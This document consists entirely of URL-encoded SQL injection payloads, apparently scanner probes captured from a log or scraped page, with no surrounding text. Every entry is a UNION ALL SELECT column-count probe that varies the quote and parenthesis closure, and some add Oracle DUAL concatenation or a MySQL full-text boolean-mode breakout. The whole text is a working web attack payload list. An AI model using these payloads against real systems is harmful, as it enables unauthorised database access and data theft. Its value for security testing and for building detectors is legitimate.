-5981%00%27%20UNION%20ALL%20SELECT%205126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%2C5126%23 -3518%00%27%20UNION%20ALL%20SELECT%203295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%2C3295%23 -4262%00%27%20UNION%20ALL%20SELECT%209933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%2C9933%23 -6737%00%27%20UNION%20ALL%20SELECT%206560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%23 -8220%00%27%20UNION%20ALL%20SELECT%201188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%2C1188%23 -4627%27%29%20WHERE%204170%3D4170%20UNION%20ALL%20SELECT%204170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%2C4170%23 -6399%27%29%20WHERE%203918%3D3918%20UNION%20ALL%20SELECT%203918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%2C3918%23 -5339%27%29%20WHERE%206580%3D6580%20UNION%20ALL%20SELECT%206580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%2C6580%23 -7777%27%29%20WHERE%204942%3D4942%20UNION%20ALL%20SELECT%204942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%2C4942%23 -2714%27%29%20WHERE%201962%3D1962%20UNION%20ALL%20SELECT%201962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%2C1962%23 -7826%27%29%20WHERE%207866%3D7866%20UNION%20ALL%20SELECT%207866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%2C7866%23 -9611%27%29%20WHERE%203032%3D3032%20UNION%20ALL%20SELECT%203032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%23 -7209%27%29%20WHERE%208220%3D8220%20UNION%20ALL%20SELECT%208220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%2C8220%23 -7353%27%29%20WHERE%209172%3D9172%20UNION%20ALL%20SELECT%209172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%2C9172%23 -4386%27%29%20WHERE%207416%3D7416%20UNION%20ALL%20SELECT%207416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%2C7416%23 -8646%22%29%20WHERE%204088%3D4088%20UNION%20ALL%20SELECT%204088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%2C4088%23 -2289%22%29%20WHERE%205818%3D5818%20UNION%20ALL%20SELECT%205818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%2C5818%23 -7903%22%29%20WHERE%206133%3D6133%20UNION%20ALL%20SELECT%206133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%2C6133%23 -3757%22%29%20WHERE%205396%3D5396%20UNION%20ALL%20SELECT%205396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%2C5396%23 -2192%22%29%20WHERE%201642%3D1642%20UNION%20ALL%20SELECT%201642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%2C1642%23 -5527%22%29%20WHERE%206144%3D6144%20UNION%20ALL%20SELECT%206144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%2C6144%23 -4434%22%29%20WHERE%204287%3D4287%20UNION%20ALL%20SELECT%204287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%2C4287%23 -9017%22%29%20WHERE%204701%3D4701%20UNION%20ALL%20SELECT%204701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%2C4701%23 -1057%22%29%20WHERE%203730%3D3730%20UNION%20ALL%20SELECT%203730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%2C3730%23 -6830%22%29%20WHERE%205600%3D5600%20UNION%20ALL%20SELECT%205600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%23 -3561%27%20WHERE%207960%3D7960%20UNION%20ALL%20SELECT%207960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%2C7960%23 -7121%27%20WHERE%201769%3D1769%20UNION%20ALL%20SELECT%201769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%2C1769%23 -2570%27%20WHERE%209650%3D9650%20UNION%20ALL%20SELECT%209650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%2C9650%23 -5587%27%20WHERE%203130%3D3130%20UNION%20ALL%20SELECT%203130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%2C3130%23 -9469%27%20WHERE%205499%3D5499%20UNION%20ALL%20SELECT%205499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%2C5499%23 -9521%27%20WHERE%209634%3D9634%20UNION%20ALL%20SELECT%209634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%2C9634%23 -1208%27%20WHERE%205595%3D5595%20UNION%20ALL%20SELECT%205595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%2C5595%23 -6895%27%20WHERE%207606%3D7606%20UNION%20ALL%20SELECT%207606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%2C7606%23 -5276%27%20WHERE%207275%3D7275%20UNION%20ALL%20SELECT%207275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%2C7275%23 -7517%27%20WHERE%208146%3D8146%20UNION%20ALL%20SELECT%208146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%2C8146%23 -7488%22%20WHERE%209413%3D9413%20UNION%20ALL%20SELECT%209413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%2C9413%23 -4926%22%20WHERE%209551%3D9551%20UNION%20ALL%20SELECT%209551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%2C9551%23 -6383%22%20WHERE%205067%3D5067%20UNION%20ALL%20SELECT%205067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%2C5067%23 -3110%22%20WHERE%206723%3D6723%20UNION%20ALL%20SELECT%206723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%2C6723%23 -6497%22%20WHERE%205799%3D5799%20UNION%20ALL%20SELECT%205799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%2C5799%23 -2128%22%20WHERE%209402%3D9402%20UNION%20ALL%20SELECT%209402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%2C9402%23 -8737%22%20WHERE%206363%3D6363%20UNION%20ALL%20SELECT%206363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%2C6363%23 -1811%22%20WHERE%209263%3D9263%20UNION%20ALL%20SELECT%209263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%23 -8026%22%20WHERE%207829%3D7829%20UNION%20ALL%20SELECT%207829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%2C7829%23 -8759%22%20WHERE%203950%3D3950%20UNION%20ALL%20SELECT%203950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%2C3950%23 -1476%27%7C%7C%28SELECT%20%27GnEk%27%20FROM%20DUAL%20WHERE%203050%3D3050%20UNION%20ALL%20SELECT%203050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%2C3050%23 -5117%27%7C%7C%28SELECT%20%27CZdT%27%20FROM%20DUAL%20WHERE%203582%3D3582%20UNION%20ALL%20SELECT%203582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%2C3582%23 -2184%27%7C%7C%28SELECT%20%27zwEq%27%20FROM%20DUAL%20WHERE%203301%3D3301%20UNION%20ALL%20SELECT%203301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%2C3301%23 -2124%27%7C%7C%28SELECT%20%27YmwA%27%20FROM%20DUAL%20WHERE%206015%3D6015%20UNION%20ALL%20SELECT%206015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%2C6015%23 -7436%27%7C%7C%28SELECT%20%27PkWE%27%20FROM%20DUAL%20WHERE%201793%3D1793%20UNION%20ALL%20SELECT%201793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%2C1793%23 -5303%27%7C%7C%28SELECT%20%27STkW%27%20FROM%20DUAL%20WHERE%203696%3D3696%20UNION%20ALL%20SELECT%203696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%2C3696%23 -4406%27%7C%7C%28SELECT%20%27ofur%27%20FROM%20DUAL%20WHERE%202092%3D2092%20UNION%20ALL%20SELECT%202092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%2C2092%23 -3501%27%7C%7C%28SELECT%20%27rsfJ%27%20FROM%20DUAL%20WHERE%201067%3D1067%20UNION%20ALL%20SELECT%201067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%2C1067%23 -6622%27%7C%7C%28SELECT%20%27cbcR%27%20FROM%20DUAL%20WHERE%204821%3D4821%20UNION%20ALL%20SELECT%204821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%2C4821%23 -3081%27%7C%7C%28SELECT%20%27otGR%27%20FROM%20DUAL%20WHERE%207932%3D7932%20UNION%20ALL%20SELECT%207932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%2C7932%23 -9144%27%7C%7C%28SELECT%20%27OXLp%27%20WHERE%205331%3D5331%20UNION%20ALL%20SELECT%205331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%2C5331%23 -3616%27%7C%7C%28SELECT%20%27fSmI%27%20WHERE%203343%3D3343%20UNION%20ALL%20SELECT%203343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%2C3343%23 -9941%27%7C%7C%28SELECT%20%27dcOv%27%20WHERE%208906%3D8906%20UNION%20ALL%20SELECT%208906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%2C8906%23 -5789%27%7C%7C%28SELECT%20%27XbNL%27%20WHERE%203567%3D3567%20UNION%20ALL%20SELECT%203567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%2C3567%23 -6902%27%7C%7C%28SELECT%20%27uqRl%27%20WHERE%208874%3D8874%20UNION%20ALL%20SELECT%208874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%2C8874%23 -4771%27%7C%7C%28SELECT%20%27JUZr%27%20WHERE%205052%3D5052%20UNION%20ALL%20SELECT%205052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%2C5052%23 -7583%27%7C%7C%28SELECT%20%27SzNx%27%20WHERE%206810%3D6810%20UNION%20ALL%20SELECT%206810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%2C6810%23 -5015%27%7C%7C%28SELECT%20%27xfpd%27%20WHERE%201400%3D1400%20UNION%20ALL%20SELECT%201400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%2C1400%23 -1911%27%7C%7C%28SELECT%20%27PbZH%27%20WHERE%205859%3D5859%20UNION%20ALL%20SELECT%205859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%2C5859%23 -4568%27%7C%7C%28SELECT%20%27Mumt%27%20WHERE%209108%3D9108%20UNION%20ALL%20SELECT%209108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%2C9108%23 -6475%27%2B%28SELECT%20kxVn%20WHERE%209456%3D9456%20UNION%20ALL%20SELECT%209456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%2C9456%23 -4102%27%2B%28SELECT%20ACuD%20WHERE%203911%3D3911%20UNION%20ALL%20SELECT%203911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%2C3911%23 -2930%27%2B%28SELECT%20QcYd%20WHERE%202746%3D2746%20UNION%20ALL%20SELECT%202746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%2C2746%23 -5566%27%2B%28SELECT%20QguW%20WHERE%203453%3D3453%20UNION%20ALL%20SELECT%203453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%2C3453%23 -7436%27%2B%28SELECT%20wyDQ%20WHERE%206122%3D6122%20UNION%20ALL%20SELECT%206122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%2C6122%23 -1692%27%2B%28SELECT%20GIOQ%20WHERE%207399%3D7399%20UNION%20ALL%20SELECT%207399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%2C7399%23 -8117%27%2B%28SELECT%20nEcR%20WHERE%209005%3D9005%20UNION%20ALL%20SELECT%209005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%2C9005%23 -1883%27%2B%28SELECT%20FiRD%20WHERE%201954%3D1954%20UNION%20ALL%20SELECT%201954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%2C1954%23 -2452%27%2B%28SELECT%20FVWh%20WHERE%207305%3D7305%20UNION%20ALL%20SELECT%207305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%23 -5722%27%2B%28SELECT%20Xfly%20WHERE%204072%3D4072%20UNION%20ALL%20SELECT%204072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%2C4072%23 -9203%27%2B%28SELECT%20%27vluM%27%20WHERE%207362%3D7362%20UNION%20ALL%20SELECT%207362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%2C7362%23 -6697%27%2B%28SELECT%20%27dZxG%27%20WHERE%207524%3D7524%20UNION%20ALL%20SELECT%207524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%2C7524%23 -4405%27%2B%28SELECT%20%27DRwc%27%20WHERE%208168%3D8168%20UNION%20ALL%20SELECT%208168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%2C8168%23 -4118%27%2B%28SELECT%20%27HEvj%27%20WHERE%209246%3D9246%20UNION%20ALL%20SELECT%209246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%2C9246%23 -9165%27%2B%28SELECT%20%27jauC%27%20WHERE%204437%3D4437%20UNION%20ALL%20SELECT%204437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%2C4437%23 -1707%27%2B%28SELECT%20%27InDA%27%20WHERE%207731%3D7731%20UNION%20ALL%20SELECT%207731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%2C7731%23 -1331%27%2B%28SELECT%20%27GnoR%27%20WHERE%207494%3D7494%20UNION%20ALL%20SELECT%207494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%2C7494%23 -6188%27%2B%28SELECT%20%27JGpH%27%20WHERE%201066%3D1066%20UNION%20ALL%20SELECT%201066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%2C1066%23 -1733%27%2B%28SELECT%20%27bgEy%27%20WHERE%207029%3D7029%20UNION%20ALL%20SELECT%207029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%2C7029%23 -9039%27%2B%28SELECT%20%27fEIR%27%20WHERE%208166%3D8166%20UNION%20ALL%20SELECT%208166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%2C8166%23 -7464%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%2C9406%23 